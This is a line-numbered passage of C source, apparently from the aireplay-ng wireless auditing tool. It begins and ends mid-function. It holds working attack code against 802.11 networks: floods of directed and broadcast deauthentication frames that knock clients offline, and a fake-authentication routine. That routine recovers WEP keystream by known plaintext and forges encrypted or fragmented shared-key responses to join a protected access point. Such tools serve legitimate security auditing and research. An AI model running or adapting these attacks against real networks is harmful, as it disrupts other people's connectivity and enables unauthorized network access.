FD_SET( dev.fd_in, &rfds );
848
849
tv.tv_sec = 1;
850
tv.tv_usec = 0;
851
852
if( select( dev.fd_in + 1, &rfds, NULL, NULL, &tv ) < 0 )
853
{
854
if( errno == EINTR ) continue;
855
perror( "select failed" );
856
return( 1 );
857
}
858
859
if( ! FD_ISSET( dev.fd_in, &rfds ) )
860
continue;
861
862
gettimeofday( &tv, NULL );
863
864
*caplen = read_packet( h80211, sizeof( h80211 ), NULL );
865
866
if( *caplen < 0 ) return( 1 );
867
if( *caplen == 0 ) continue;
868
}
869
else
870
{
871
/* there are no hidden backdoors in this source code */
872
873
n = sizeof( pkh );
874
875
if( fread( &pkh, n, 1, dev.f_cap_in ) != 1 )
876
{
877
printf( "\r\33[KEnd of file.\n" );
878
return( 1 );
879
}
880
881
if( dev.pfh_in.magic == TCPDUMP_CIGAM )
882
SWAP32( pkh.caplen );
883
884
tv.tv_sec = pkh.tv_sec;
885
tv.tv_usec = pkh.tv_usec;
886
887
n = *caplen = pkh.caplen;
888
889
if( n <= 0 || n > (int) sizeof( h80211 ) || n > (int) sizeof( tmpbuf ) )
890
{
891
printf( "\r\33[KInvalid packet length %d.\n", n );
892
return( 1 );
893
}
894
895
if( fread( h80211, n, 1, dev.f_cap_in ) != 1 )
896
{
897
printf( "\r\33[KEnd of file.\n" );
898
return( 1 );
899
}
900
901
if( dev.pfh_in.linktype == LINKTYPE_PRISM_HEADER )
902
{
903
/* remove the prism header */
904
905
if( h80211[7] == 0x40 )
906
n = 64;
907
else
908
n = *(int *)( h80211 + 4 );
909
910
if( n < 8 || n >= (int) *caplen )
911
continue;
912
913
memcpy( tmpbuf, h80211, *caplen );
914
*caplen -= n;
915
memcpy( h80211, tmpbuf + n, *caplen );
916
}
917
918
if( dev.pfh_in.linktype == LINKTYPE_RADIOTAP_HDR )
919
{
920
/* remove the radiotap header */
921
922
n = *(unsigned short *)( h80211 + 2 );
923
924
if( n <= 0 || n >= (int) *caplen )
925
continue;
926
927
memcpy( tmpbuf, h80211, *caplen );
928
*caplen -= n;
929
memcpy( h80211, tmpbuf + n, *caplen );
930
}
931
932
if( dev.pfh_in.linktype == LINKTYPE_PPI_HDR )
933
{
934
/* remove the PPI header */
935
936
n = le16_to_cpu(*(unsigned short *)( h80211 + 2));
937
938
if( n <= 0 || n>= (int) *caplen )
939
continue;
940
941
/* for a while Kismet logged broken PPI headers */
942
if ( n == 24 && le16_to_cpu(*(unsigned short *)(h80211 + 8)) == 2 )
943
n = 32;
944
945
if( n <= 0 || n>= (int) *caplen )
946
continue;
947
948
memcpy( tmpbuf, h80211, *caplen );
949
*caplen -= n;
950
memcpy( h80211, tmpbuf + n, *caplen );
951
}
952
}
953
954
nb_pkt_read++;
955
956
if( filter_packet( h80211, *caplen ) != 0 )
957
continue;
958
959
if(opt.fast)
960
break;
961
962
z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
963
if ( ( h80211[0] & 0x80 ) == 0x80 ) /* QoS */
964
z+=2;
965
966
switch( h80211[1] & 3 )
967
{
968
case 0: mi_b = 16; mi_s = 10; mi_d = 4; is_wds = 0; break;
969
case 1: mi_b = 4; mi_s = 10; mi_d = 16; is_wds = 0; break;
970
case 2: mi_b = 10; mi_s = 16; mi_d = 4; is_wds = 0; break;
971
case 3: mi_t = 10; mi_r = 4; mi_d = 16; mi_s = 24; is_wds = 1; break; // WDS packet
972
}
973
974
printf( "\n\n Size: %d, FromDS: %d, ToDS: %d",
975
*caplen, ( h80211[1] & 2 ) >> 1, ( h80211[1] & 1 ) );
976
977
if( ( h80211[0] & 0x0C ) == 8 && ( h80211[1] & 0x40 ) != 0 )
978
{
979
// if (is_wds) key_index_offset = 33; // WDS packets have an additional MAC, so the key index is at byte 33
980
// else key_index_offset = 27;
981
key_index_offset = z+3;
982
983
if( ( h80211[key_index_offset] & 0x20 ) == 0 )
984
printf( " (WEP)" );
985
else
986
printf( " (WPA)" );
987
}
988
989
printf( "\n\n" );
990
991
if (is_wds) {
992
printf( " Transmitter = %02X:%02X:%02X:%02X:%02X:%02X\n",
993
h80211[mi_t ], h80211[mi_t + 1],
994
h80211[mi_t + 2], h80211[mi_t + 3],
995
h80211[mi_t + 4], h80211[mi_t + 5] );
996
997
printf( " Receiver = %02X:%02X:%02X:%02X:%02X:%02X\n",
998
h80211[mi_r ], h80211[mi_r + 1],
999
h80211[mi_r + 2], h80211[mi_r + 3],
1000
h80211[mi_r + 4], h80211[mi_r + 5] );
1001
} else {
1002
printf( " BSSID = %02X:%02X:%02X:%02X:%02X:%02X\n",
1003
h80211[mi_b ], h80211[mi_b + 1],
1004
h80211[mi_b + 2], h80211[mi_b + 3],
1005
h80211[mi_b + 4], h80211[mi_b + 5] );
1006
}
1007
1008
printf( " Dest. MAC = %02X:%02X:%02X:%02X:%02X:%02X\n",
1009
h80211[mi_d ], h80211[mi_d + 1],
1010
h80211[mi_d + 2], h80211[mi_d + 3],
1011
h80211[mi_d + 4], h80211[mi_d + 5] );
1012
1013
printf( " Source MAC = %02X:%02X:%02X:%02X:%02X:%02X\n",
1014
h80211[mi_s ], h80211[mi_s + 1],
1015
h80211[mi_s + 2], h80211[mi_s + 3],
1016
h80211[mi_s + 4], h80211[mi_s + 5] );
1017
1018
/* print a hex dump of the packet */
1019
1020
for( i = 0; i < *caplen; i++ )
1021
{
1022
if( ( i & 15 ) == 0 )
1023
{
1024
if( i == 224 )
1025
{
1026
printf( "\n --- CUT ---" );
1027
break;
1028
}
1029
1030
printf( "\n 0x%04x: ", i );
1031
}
1032
1033
printf( "%02x", h80211[i] );
1034
1035
if( ( i & 1 ) != 0 )
1036
printf( " " );
1037
1038
if( i == *caplen - 1 && ( ( i + 1 ) & 15 ) != 0 )
1039
{
1040
for( j = ( ( i + 1 ) & 15 ); j < 16; j++ )
1041
{
1042
printf( " " );
1043
if( ( j & 1 ) != 0 )
1044
printf( " " );
1045
}
1046
1047
printf( " " );
1048
1049
for( j = 16 - ( ( i + 1 ) & 15 ); j < 16; j++ )
1050
printf( "%c", ( h80211[i - 15 + j] < 32 ||
1051
h80211[i - 15 + j] > 126 )
1052
? '.' : h80211[i - 15 + j] );
1053
}
1054
1055
if( i > 0 && ( ( i + 1 ) & 15 ) == 0 )
1056
{
1057
printf( " " );
1058
1059
for( j = 0; j < 16; j++ )
1060
printf( "%c", ( h80211[i - 15 + j] < 32 ||
1061
h80211[i - 15 + j] > 127 )
1062
? '.' : h80211[i - 15 + j] );
1063
}
1064
}
1065
1066
printf( "\n\nUse this packet ? " );
1067
fflush( stdout );
1068
ret=0;
1069
while(!ret) ret = scanf( "%s", tmpbuf );
1070
printf( "\n" );
1071
1072
if( tmpbuf[0] == 'y' || tmpbuf[0] == 'Y' )
1073
break;
1074
}
1075
1076
if(!just_grab)
1077
{
1078
pfh_out.magic = TCPDUMP_MAGIC;
1079
pfh_out.version_major = PCAP_VERSION_MAJOR;
1080
pfh_out.version_minor = PCAP_VERSION_MINOR;
1081
pfh_out.thiszone = 0;
1082
pfh_out.sigfigs = 0;
1083
pfh_out.snaplen = 65535;
1084
pfh_out.linktype = LINKTYPE_IEEE802_11;
1085
1086
lt = localtime( (const time_t *) &tv.tv_sec );
1087
1088
memset( strbuf, 0, sizeof( strbuf ) );
1089
snprintf( strbuf, sizeof( strbuf ) - 1,
1090
"replay_src-%02d%02d-%02d%02d%02d.cap",
1091
lt->tm_mon + 1, lt->tm_mday,
1092
lt->tm_hour, lt->tm_min, lt->tm_sec );
1093
1094
printf( "Saving chosen packet in %s\n", strbuf );
1095
1096
if( ( f_cap_out = fopen( strbuf, "wb+" ) ) == NULL )
1097
{
1098
perror( "fopen failed" );
1099
return( 1 );
1100
}
1101
1102
n = sizeof( struct pcap_file_header );
1103
1104
if( fwrite( &pfh_out, n, 1, f_cap_out ) != 1 )
1105
{
1106
fclose(f_cap_out);
1107
perror( "fwrite failed\n" );
1108
return( 1 );
1109
}
1110
1111
pkh.tv_sec = tv.tv_sec;
1112
pkh.tv_usec = tv.tv_usec;
1113
pkh.caplen = *caplen;
1114
pkh.len = *caplen;
1115
1116
n = sizeof( pkh );
1117
1118
if( fwrite( &pkh, n, 1, f_cap_out ) != 1 )
1119
{
1120
fclose(f_cap_out);
1121
perror( "fwrite failed" );
1122
return( 1 );
1123
}
1124
1125
n = pkh.caplen;
1126
1127
if( fwrite( h80211, n, 1, f_cap_out ) != 1 )
1128
{
1129
fclose(f_cap_out);
1130
perror( "fwrite failed" );
1131
return( 1 );
1132
}
1133
1134
fclose( f_cap_out );
1135
}
1136
1137
return( 0 );
1138
}
1139
1140
int read_prga(unsigned char **dest, char *file)
1141
{
1142
FILE *f;
1143
int size;
1144
1145
if(file == NULL) return( 1 );
1146
if(*dest == NULL) *dest = (unsigned char*) malloc(1501);
1147
1148
f = fopen(file, "r");
1149
1150
if(f == NULL)
1151
{
1152
printf("Error opening %s\n", file);
1153
return( 1 );
1154
}
1155
1156
fseek(f, 0, SEEK_END);
1157
size = ftell(f);
1158
rewind(f);
1159
1160
if(size > 1500) size = 1500;
1161
1162
if( fread( (*dest), size, 1, f ) != 1 )
1163
{
1164
fclose(f);
1165
fprintf( stderr, "fread failed\n" );
1166
return( 1 );
1167
}
1168
1169
opt.prgalen = size;
1170
1171
fclose(f);
1172
return( 0 );
1173
}
1174
1175
void add_icv(uchar *input, int len, int offset)
1176
{
1177
unsigned long crc = 0xFFFFFFFF;
1178
int n=0;
1179
1180
for( n = offset; n < len; n++ )
1181
crc = crc_tbl[(crc ^ input[n]) & 0xFF] ^ (crc >> 8);
1182
1183
crc = ~crc;
1184
1185
input[len] = (crc ) & 0xFF;
1186
input[len+1] = (crc >> 8) & 0xFF;
1187
input[len+2] = (crc >> 16) & 0xFF;
1188
input[len+3] = (crc >> 24) & 0xFF;
1189
1190
return;
1191
}
1192
1193
void send_fragments(uchar *packet, int packet_len, uchar *iv, uchar *keystream, int fragsize, int ska)
1194
{
1195
int t, u;
1196
int data_size;
1197
uchar frag[32+fragsize];
1198
int pack_size;
1199
int header_size=24;
1200
1201
data_size = packet_len-header_size;
1202
packet[23] = (rand() % 0xFF);
1203
1204
for (t=0; t+=fragsize;)
1205
{
1206
1207
//Copy header
1208
memcpy(frag, packet, header_size);
1209
1210
//Copy IV + KeyIndex
1211
memcpy(frag+header_size, iv, 4);
1212
1213
//Copy data
1214
if(fragsize <= packet_len-(header_size+t-fragsize))
1215
memcpy(frag+header_size+4, packet+header_size+t-fragsize, fragsize);
1216
else
1217
memcpy(frag+header_size+4, packet+header_size+t-fragsize, packet_len-(header_size+t-fragsize));
1218
1219
//Make ToDS frame
1220
if(!ska)
1221
{
1222
frag[1] |= 1;
1223
frag[1] &= 253;
1224
}
1225
1226
//Set fragment bit
1227
if (t< data_size) frag[1] |= 4;
1228
if (t>=data_size) frag[1] &= 251;
1229
1230
//Fragment number
1231
frag[22] = 0;
1232
for (u=t; u-=fragsize;)
1233
{
1234
frag[22] += 1;
1235
}
1236
// frag[23] = 0;
1237
1238
//Calculate packet length
1239
if(fragsize <= packet_len-(header_size+t-fragsize))
1240
pack_size = header_size + 4 + fragsize;
1241
else
1242
pack_size = header_size + 4 + (packet_len-(header_size+t-fragsize));
1243
1244
//Add ICV
1245
add_icv(frag, pack_size, header_size + 4);
1246
pack_size += 4;
1247
1248
//Encrypt
1249
xor_keystream(frag + header_size + 4, keystream, fragsize+4);
1250
1251
//Send
1252
send_packet(frag, pack_size);
1253
if (t<data_size)usleep(100);
1254
1255
if (t>=data_size) break;
1256
}
1257
1258
}
1259
1260
int do_attack_deauth( void )
1261
{
1262
int i, n;
1263
int aacks, sacks, caplen;
1264
struct timeval tv;
1265
fd_set rfds;
1266
1267
if(getnet(NULL, 0, 1) != 0)
1268
return 1;
1269
1270
if( memcmp( opt.r_dmac, NULL_MAC, 6 ) == 0 )
1271
printf( "NB: this attack is more effective when targeting\n"
1272
"a connected wireless client (-c <client's mac>).\n" );
1273
1274
n = 0;
1275
1276
while( 1 )
1277
{
1278
if( opt.a_count > 0 && ++n > opt.a_count )
1279
break;
1280
1281
usleep( 180000 );
1282
1283
if( memcmp( opt.r_dmac, NULL_MAC, 6 ) != 0 )
1284
{
1285
/* deauthenticate the target */
1286
1287
memcpy( h80211, DEAUTH_REQ, 26 );
1288
memcpy( h80211 + 16, opt.r_bssid, 6 );
1289
1290
aacks = 0;
1291
sacks = 0;
1292
for( i = 0; i < 64; i++ )
1293
{
1294
if(i == 0)
1295
{
1296
PCT; printf( "Sending 64 directed DeAuth. STMAC:"
1297
" [%02X:%02X:%02X:%02X:%02X:%02X] [%2d|%2d ACKs]\r",
1298
opt.r_dmac[0], opt.r_dmac[1],
1299
opt.r_dmac[2], opt.r_dmac[3],
1300
opt.r_dmac[4], opt.r_dmac[5],
1301
sacks, aacks );
1302
}
1303
1304
memcpy( h80211 + 4, opt.r_dmac, 6 );
1305
memcpy( h80211 + 10, opt.r_bssid, 6 );
1306
1307
if( send_packet( h80211, 26 ) < 0 )
1308
return( 1 );
1309
1310
usleep( 2000 );
1311
1312
memcpy( h80211 + 4, opt.r_bssid, 6 );
1313
memcpy( h80211 + 10, opt.r_dmac, 6 );
1314
1315
if( send_packet( h80211, 26 ) < 0 )
1316
return( 1 );
1317
1318
usleep( 2000 );
1319
1320
while( 1 )
1321
{
1322
FD_ZERO( &rfds );
1323
FD_SET( dev.fd_in, &rfds );
1324
1325
tv.tv_sec = 0;
1326
tv.tv_usec = 1000;
1327
1328
if( select( dev.fd_in + 1, &rfds, NULL, NULL, &tv ) < 0 )
1329
{
1330
if( errno == EINTR ) continue;
1331
perror( "select failed" );
1332
return( 1 );
1333
}
1334
1335
if( ! FD_ISSET( dev.fd_in, &rfds ) )
1336
break;
1337
1338
caplen = read_packet( tmpbuf, sizeof( tmpbuf ), NULL );
1339
1340
if(caplen <= 0 ) break;
1341
if(caplen != 10) continue;
1342
if( tmpbuf[0] == 0xD4)
1343
{
1344
if( memcmp(tmpbuf+4, opt.r_dmac, 6) == 0 )
1345
{
1346
aacks++;
1347
}
1348
if( memcmp(tmpbuf+4, opt.r_bssid, 6) == 0 )
1349
{
1350
sacks++;
1351
}
1352
PCT; printf( "Sending 64 directed DeAuth. STMAC:"
1353
" [%02X:%02X:%02X:%02X:%02X:%02X] [%2d|%2d ACKs]\r",
1354
opt.r_dmac[0], opt.r_dmac[1],
1355
opt.r_dmac[2], opt.r_dmac[3],
1356
opt.r_dmac[4], opt.r_dmac[5],
1357
sacks, aacks );
1358
}
1359
}
1360
}
1361
printf("\n");
1362
}
1363
else
1364
{
1365
/* deauthenticate all stations */
1366
1367
PCT; printf( "Sending DeAuth to broadcast -- BSSID:"
1368
" [%02X:%02X:%02X:%02X:%02X:%02X]\n",
1369
opt.r_bssid[0], opt.r_bssid[1],
1370
opt.r_bssid[2], opt.r_bssid[3],
1371
opt.r_bssid[4], opt.r_bssid[5] );
1372
1373
memcpy( h80211, DEAUTH_REQ, 26 );
1374
1375
memcpy( h80211 + 4, BROADCAST, 6 );
1376
memcpy( h80211 + 10, opt.r_bssid, 6 );
1377
memcpy( h80211 + 16, opt.r_bssid, 6 );
1378
1379
for( i = 0; i < 128; i++ )
1380
{
1381
if( send_packet( h80211, 26 ) < 0 )
1382
return( 1 );
1383
1384
usleep( 2000 );
1385
}
1386
}
1387
}
1388
1389
return( 0 );
1390
}
1391
1392
int do_attack_fake_auth( void )
1393
{
1394
time_t tt, tr;
1395
struct timeval tv, tv2, tv3;
1396
1397
fd_set rfds;
1398
int i, n, state, caplen, z;
1399
int mi_b, mi_s, mi_d;
1400
int x_send;
1401
int kas;
1402
int tries;
1403
int retry = 0;
1404
int abort;
1405
int gotack = 0;
1406
uchar capa[2];
1407
int deauth_wait=3;
1408
int ska=0;
1409
int keystreamlen=0;
1410
int challengelen=0;
1411
int weight[16];
1412
int notice=0;
1413
int packets=0;
1414
int aid=0;
1415
1416
unsigned char ackbuf[14];
1417
unsigned char ctsbuf[10];
1418
unsigned char iv[4];
1419
unsigned char challenge[2048];
1420
unsigned char keystream[2048];
1421
1422
1423
if( memcmp( opt.r_smac, NULL_MAC, 6 ) == 0 )
1424
{
1425
printf( "Please specify a source MAC (-h).\n" );
1426
return( 1 );
1427
}
1428
1429
if(getnet(capa, 0, 1) != 0)
1430
return 1;
1431
1432
if( strlen(opt.r_essid) == 0 || opt.r_essid[0] < 32)
1433
{
1434
printf( "Please specify an ESSID (-e).\n" );
1435
return 1;
1436
}
1437
1438
memcpy( ackbuf, "\xD4\x00\x00\x00", 4 );
1439
memcpy( ackbuf + 4, opt.r_bssid, 6 );
1440
memset( ackbuf + 10, 0, 4 );
1441
1442
memcpy( ctsbuf, "\xC4\x00\x94\x02", 4 );
1443
memcpy( ctsbuf + 4, opt.r_bssid, 6 );
1444
1445
tries = 0;
1446
abort = 0;
1447
state = 0;
1448
x_send=opt.npackets;
1449
if(opt.npackets == 0)
1450
x_send=4;
1451
1452
if(opt.prga != NULL)
1453
ska=1;
1454
1455
tt = time( NULL );
1456
tr = time( NULL );
1457
1458
while( 1 )
1459
{
1460
switch( state )
1461
{
1462
case 0:
1463
if (opt.f_retry > 0) {
1464
if (retry == opt.f_retry) {
1465
abort = 1;
1466
return 1;
1467
}
1468
++retry;
1469
}
1470
1471
if(ska && keystreamlen == 0)
1472
{
1473
opt.fast = 1; //don't ask for approval
1474
memcpy(opt.f_bssid, opt.r_bssid, 6); //make the filter bssid the same, that is used for auth'ing
1475
if(opt.prga==NULL)
1476
{
1477
while(keystreamlen < 16)
1478
{
1479
capture_ask_packet(&caplen, 1); //wait for data packet
1480
z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
1481
if ( ( h80211[0] & 0x80 ) == 0x80 ) /* QoS */
1482
z+=2;
1483
1484
memcpy(iv, h80211+z, 4); //copy IV+IDX
1485
i = known_clear(keystream, &keystreamlen, weight, h80211, caplen-z-4-4); //recover first bytes
1486
if(i>1)
1487
{
1488
keystreamlen=0;
1489
}
1490
for(i=0;i<keystreamlen;i++)
1491
keystream[i] ^= h80211[i+z+4];
1492
}
1493
}
1494
else
1495
{
1496
keystreamlen = opt.prgalen-4;
1497
memcpy(iv, opt.prga, 4);
1498
memcpy(keystream, opt.prga+4, keystreamlen);
1499
}
1500
}
1501
1502
state = 1;
1503
tt = time( NULL );
1504
1505
/* attempt to authenticate */
1506
1507
memcpy( h80211, AUTH_REQ, 30 );
1508
memcpy( h80211 + 4, opt.r_bssid, 6 );
1509
memcpy( h80211 + 10, opt.r_smac , 6 );
1510
memcpy( h80211 + 16, opt.r_bssid, 6 );
1511
if(ska)
1512
h80211[24]=0x01;
1513
1514
printf("\n");
1515
PCT; printf( "Sending Authentication Request" );
1516
if(!ska)
1517
printf(" (Open System)");
1518
else
1519
printf(" (Shared Key)");
1520
fflush( stdout );
1521
gotack=0;
1522
1523
for( i = 0; i < x_send; i++ )
1524
{
1525
if( send_packet( h80211, 30 ) < 0 )
1526
return( 1 );
1527
1528
usleep(10);
1529
1530
if( send_packet( ackbuf, 14 ) < 0 )
1531
return( 1 );
1532
usleep(10);
1533
1534
if( send_packet( ackbuf, 14 ) < 0 )
1535
return( 1 );
1536
}
1537
1538
break;
1539
1540
case 1:
1541
1542
/* waiting for an authentication response */
1543
1544
if( time( NULL ) - tt >= 2 )
1545
{
1546
if(opt.npackets > 0)
1547
{
1548
tries++;
1549
1550
if( tries > 15 )
1551
{
1552
abort = 1;
1553
}
1554
}
1555
else
1556
{
1557
if( x_send < 256 )
1558
{
1559
x_send *= 2;
1560
}
1561
else
1562
{
1563
abort = 1;
1564
}
1565
}
1566
1567
if( abort )
1568
{
1569
printf(
1570
"\nAttack was unsuccessful. Possible reasons:\n\n"
1571
" * Perhaps MAC address filtering is enabled.\n"
1572
" * Check that the BSSID (-a option) is correct.\n"
1573
" * Try to change the number of packets (-o option).\n"
1574
" * The driver/card doesn't support injection.\n"
1575
" * This attack sometimes fails against some APs.\n"
1576
" * The card is not on the same channel as the AP.\n"
1577
" * You're too far from the AP. Get closer, or lower\n"
1578
" the transmit rate.\n\n" );
1579
return( 1 );
1580
}
1581
1582
state = 0;
1583
challengelen = 0;
1584
printf("\n");
1585
}
1586
1587
break;
1588
1589
case 2:
1590
1591
state = 3;
1592
tt = time( NULL );
1593
1594
/* attempt to authenticate using ska */
1595
1596
memcpy( h80211, AUTH_REQ, 30 );
1597
memcpy( h80211 + 4, opt.r_bssid, 6 );
1598
memcpy( h80211 + 10, opt.r_smac , 6 );
1599
memcpy( h80211 + 16, opt.r_bssid, 6 );
1600
h80211[1] |= 0x40; //set wep bit, as this frame is encrypted
1601
memcpy(h80211+24, iv, 4);
1602
memcpy(h80211+28, challenge, challengelen);
1603
h80211[28] = 0x01; //its always ska in state==2
1604
h80211[30] = 0x03; //auth sequence number 3
1605
fflush(stdout);
1606
1607
if(keystreamlen < challengelen+4 && notice == 0)
1608
{
1609
notice = 1;
1610
if(opt.prga != NULL)
1611
{
1612
PCT; printf( "Specified xor file (-y) is too short, you need at least %d keystreambytes.\n", challengelen+4);
1613
}
1614
else
1615
{
1616
PCT; printf( "You should specify a xor file (-y) with at least %d keystreambytes\n", challengelen+4);
1617
}
1618
PCT; printf( "Trying fragmented shared key fake auth.\n");
1619
}
1620
PCT; printf( "Sending encrypted challenge." );
1621
fflush( stdout );
1622
gotack=0;
1623
gettimeofday(&tv2, NULL);
1624
1625
for( i = 0; i < x_send; i++ )
1626
{
1627
if(keystreamlen < challengelen+4)
1628
{
1629
packets=(challengelen)/(keystreamlen-4);
1630
if( (challengelen)%(keystreamlen-4) != 0 )
1631
packets++;
1632
1633
memcpy(h80211+24, challenge, challengelen);
1634
h80211[24]=0x01;
1635
h80211[26]=0x03;
1636
send_fragments(h80211, challengelen+24, iv, keystream, keystreamlen-4, 1);
1637
}
1638
else
1639
{
1640
add_icv(h80211, challengelen+28, 28);
1641
xor_keystream(h80211+28, keystream, challengelen+4);
1642
send_packet(h80211, 24+4+challengelen+4);
1643
}
1644
1645
if( send_packet( ackbuf, 14 ) < 0 )
1646
return( 1 );
1647
usleep(10);
1648
1649
if( send_packet( ackbuf, 14 ) < 0 )
1650
return( 1 );
1651
}
1652
1653
break;
1654
1655
case 3:
1656
1657
/* waiting for an authentication response (using ska) */
1658
1659
if( time( NULL ) - tt >= 2 )
1660
{
1661
if(opt.npackets > 0)
1662
{
1663
tries++;
1664
1665
if( tries > 15 )
1666
{
1667
abort = 1;
1668
}
1669
}
1670
else
1671
{
1672
if( x_send < 256 )
1673
{
1674
x_send *= 2;
1675
}
1676
else
1677
{
1678
abort = 1;
1679
}
1680
}
1681
1682
if( abort )
1683
{
1684
printf(
1685
"\nAttack was unsuccessful. Possible reasons:\n\n"
1686
" * Perhaps MAC address filtering is enabled.\n"
1687
" * Check that the BSSID (-a option) is correct.\n"
1688
" * Try to change the number of packets (-o option).\n"
1689
" * The driver/card doesn't support injection.\n"
1690
" * This attack sometimes fails against some APs.\n"
1691
" * The card is not on the same channel as the AP.\n"
1692
" * You're too far from the AP. Get closer, or lower\n"
1693
" the transmit rate.\n\n" );
1694
return( 1 );
1695
}
1696
1697
state = 0;
1698
challengelen=0;
1699
printf("\n");
1700
}
1701
1702
break;
1703
1704
case 4:
1705
1706
tries = 0;
1707
state = 5;
1708
if(opt.npackets == -1) x_send *= 2;
1709
tt = time( NULL );
1710
1711
/* attempt to associate */
1712
1713
memcpy( h80211, ASSOC_REQ, 28 );
1714
memcpy( h80211 + 4, opt.r_bssid, 6 );
1715
memcpy( h80211 + 10, opt.r_smac , 6 );
1716
memcpy( h80211 + 16, opt.r_bssid, 6 );
1717
1718
n = strlen( opt.r_essid );
1719
if( n > 32 ) n = 32;
1720
1721
h80211[28] = 0x00;
1722
h80211[29] = n;
1723
1724
memcpy( h80211 + 30, opt.r_essid, n );
1725
memcpy( h80211 + 30 + n, RATES, 16 );
1726
memcpy( h80211 + 24, capa, 2);
1727
1728
PCT; printf( "Sending Association Request" );
1729
fflush( stdout );
1730
gotack=0;
1731
1732
for( i = 0; i < x_send; i++ )
1733
{
1734
if( send_packet( h80211, 46 + n ) < 0 )
1735
return( 1 );
1736
1737
usleep(10);
1738
1739
if( send_packet( ackbuf, 14 ) < 0 )
1740
return( 1 );
1741
usleep(10);
1742
1743
if( send_packet( ackbuf, 14 ) < 0 )
1744
return( 1 );
1745
}
1746
1747
break;
1748
1749
case 5:
1750
1751
/* waiting for an association response */
1752
1753
if( time( NULL ) - tt >= 5 )
1754
{
1755
if( x_send < 256 && (opt.npackets == -1) )
1756
x_send *= 4;
1757
1758
state = 0;
1759
challengelen = 0;
1760
printf("\n");
1761
}
1762
1763
break;
1764
1765
case 6:
1766
1767
if( opt.a_delay == 0 )
1768
{
1769
printf("\n");
1770
return( 0 );
1771
}
1772
1773
if( time( NULL ) - tt >= opt.a_delay )
1774
{
1775
if(opt.npackets == -1) x_send = 4;
1776
state = 0;
1777
challengelen = 0;
1778
break;
1779
}
1780
1781
if( time( NULL ) - tr >= opt.delay )
1782
{
1783
tr = time( NULL );
1784
printf("\n");
1785
PCT; printf( "Sending keep-alive packet" );
1786
fflush( stdout );
1787
gotack=0;
1788
1789
memcpy( h80211, NULL_DATA, 24 );
1790
memcpy( h80211 + 4, opt.r_bssid, 6 );
1791
memcpy( h80211 + 10, opt.r_smac, 6 );
1792
memcpy( h80211 + 16, opt.r_bssid, 6 );
1793
1794
if( opt.npackets > 0 ) kas = opt.npackets;
1795
else kas = 32;
1796
1797
for( i = 0; i < kas; i++ )
1798
if( send_packet( h80211, 24 ) < 0 )
1799
return( 1 );
1800
}
1801
1802
break;
1803
1804
default: break;
1805
}
1806
1807
/* read one frame */
1808
1809
FD_ZERO( &rfds );
1810
FD_SET( dev.fd_in, &rfds );
1811
1812
tv.tv_sec = 1;
1813
tv.tv_usec = 0;
1814
1815
if( select( dev.fd_in + 1, &rfds, NULL, NULL, &tv ) < 0 )
1816
{
1817
if( errno == EINTR ) continue;
1818
perror( "select failed" );
1819
return( 1 );
1820
}
1821
1822
if( ! FD_ISSET( dev.fd_in, &rfds ) )
1823
continue;
1824
1825
caplen = read_packet( h80211, sizeof( h80211 ), NULL );
1826
1827
if( caplen < 0 ) return( 1 );
1828
if( caplen == 0 ) continue;
1829
1830
if( caplen == 10 && h80211[0] == 0xD4)
1831
{
1832
if( memcmp(h80211+4, opt.r_smac, 6) == 0 )
1833
{
1834
gotack++;
1835
if(gotack==1)
1836
{
1837
printf(" [ACK]");
1838
fflush( stdout );
1839
}
1840
}
1841
}
1842
1843
gettimeofday(&tv3, NULL);
1844
1845
//wait 100ms for acks
1846
if ( (((tv3.tv_sec*1000000 - tv2.tv_sec*1000000) + (tv3.tv_usec - tv2.tv_usec)) > (100*1000)) &&
1847
(gotack > 0) && (gotack < packets) && (state == 3) && (packets > 1) )
1848
{
1849
PCT; printf("Not enough acks, repeating...\n");
1850
state=2;
1851
continue;
1852
}
1853
1854
if( caplen < 24 )
1855
continue;
1856
1857
switch( h80211[1] & 3 )
1858
{
1859
case 0: mi_b = 16; mi_s = 10; mi_d = 4; break;
1860
case 1: mi_b = 4; mi_s = 10; mi_d = 16; break;
1861
case 2: mi_b = 10; mi_s = 16; mi_d = 4; break;
1862
default: mi_b = 10; mi_d = 16; mi_s = 24; break;
1863
}
1864
1865
/* check if the dest. MAC is ours and source == AP */
1866
1867
if( memcmp( h80211 + mi_d, opt.r_smac, 6 ) == 0 &&
1868
memcmp( h80211 + mi_b, opt.r_bssid, 6 ) == 0 &&
1869
memcmp( h80211 + mi_s, opt.r_bssid, 6 ) == 0 )
1870
{
1871
/* check if we got an deauthentication packet */
1872
1873
if( h80211[0] == 0xC0 ) //removed && state == 4
1874
{
1875
printf("\n");
1876
PCT; printf( "Got a deauthentication packet! (Waiting %d seconds)\n", deauth_wait );
1877
if(opt.npackets == -1) x_send = 4;
1878
state = 0;
1879
challengelen = 0;
1880
read_sleep( deauth_wait * 1000000 );
1881
deauth_wait += 2;
1882
continue;
1883
}
1884
1885
/* check if we got an disassociation packet */
1886
1887
if( h80211[0] == 0xA0 && state == 6 )
1888
{
1889
printf("\n");
1890
PCT; printf( "Got a disassociation packet! (Waiting %d seconds)\n", deauth_wait );
1891
if(opt.npackets == -1) x_send = 4;
1892
state = 0;
1893
challengelen = 0;
1894
read_sleep( deauth_wait );
1895
deauth_wait += 2;
1896
continue;
1897
}
1898
1899
/* check if we got an authentication response */
1900
1901
if( h80211[0] == 0xB0 && (state == 1 || state == 3) )
1902
{
1903
if(ska)
1904
{
1905
if( (state==1 && h80211[26] != 0x02) || (state==3 && h80211[26] != 0x04) )
1906
continue;
1907
}
1908
1909
printf("\n");
1910
PCT;
1911
1912
state = 0;
1913
1914
if( caplen < 30 )
1915
{
1916
printf( "Error: packet length < 30 bytes\n" );
1917
read_sleep( 3*1000000 );
1918
challengelen = 0;
1919
continue;
1920
}
1921
1922
if( (h80211[24] != 0 || h80211[25] != 0) && ska==0)
1923
{
1924
ska=1;
1925
printf("Switching to shared key authentication\n");
1926
read_sleep(2*1000000); //read sleep 2s
1927
challengelen = 0;
1928
continue;
1929
}
1930
1931
n = h80211[28] + ( h80211[29] << 8 );
1932
1933
if( n != 0 )
1934
{
1935
switch( n )
1936
{
1937
case 1:
1938
printf( "AP rejects the source MAC address (%02X:%02X:%02X:%02X:%02X:%02X) ?\n",
1939
opt.r_smac[0], opt.r_smac[1], opt.r_smac[2],
1940
opt.r_smac[3], opt.r_smac[4], opt.r_smac[5] );
1941
break;
1942
1943
case 10:
1944
printf( "AP rejects our capabilities\n" );
1945
break;
1946
1947
case 13:
1948
case 15:
1949
ska=1;
1950
if(h80211[26] == 0x02)
1951
